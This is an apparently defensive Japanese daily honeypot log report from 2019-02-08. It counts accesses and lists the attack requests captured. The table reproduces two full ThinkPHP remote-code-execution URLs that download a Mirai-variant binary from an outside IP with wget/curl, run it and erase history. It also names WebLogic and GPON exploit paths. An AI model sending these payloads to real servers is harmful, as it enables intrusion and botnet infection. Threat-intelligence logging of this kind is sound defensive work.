ハニーポットのログ分析（2019/02/08）

WOWhoneypotの2019/02/08(金) (運用247日目)の簡易分析です。
本日の総アクセス件数は 41件です。送信元IPは36IPでした。

本日の主なアクセスは以下です。

・ThinkPHPの脆弱性を突いた攻撃：2件
　→User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64

本日のドメイン名でのアクセスは以下です。

3 GET /
1 GET /robots.txt

本日のハンティングログは以下です。どちらもThinkPHPを狙ったもので同一IPからです。

1 2019-02-08 wget hxxp://104.248.211[.]25/V1/saskia.x86
1 2019-02-08 curl -O hxxp://104.248.211[.]25/V1/saskia.x86

件数	日付	種別	リクエスト
34	2019-02-08	アクセス	GET /
1	2019-02-08	Weblogicの脆弱性(CVE-2017-10271)を突く攻撃	POST /wls-wsat/CoordinatorPortType
1	2019-02-08	GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃	POST /GponForm/diag_Form?style/
1	2019-02-08	クローリング	GET /robots.txt
1	2019-02-08	ThinkPHPの脆弱性を突いた攻撃	GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=cd%20/tmp;wget%20hxxp://104.248.211.25/V1/saskia.x86;cat%20saskia.x86%20%3E%20Mira01;chmod%20777%20Mira01;./Mira01%20thinkphp;%20rm%20rf%20Mira01%20saskia.x86;%20history%20-c
1	2019-02-08	ThinkPHPの脆弱性を突いた攻撃	GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=cd%20/tmp;curl%20-O%20hxxp://104.248.211.25/V1/saskia.x86;cat%20saskia.x86%20%3E%20Mira01;chmod%20777%20Mira01;./Mira01%20thinkphp;%20rm%20rf%20Mira01%20saskia.x86;%20history%20-c
1	2019-02-08	phpMyAdminの調査	GET /phpmyadmin/
1	2019-02-08	不明	GET /6DC23FBA2D7BD8D5B2D3D5802BD55193.php

以上です。

S-Owl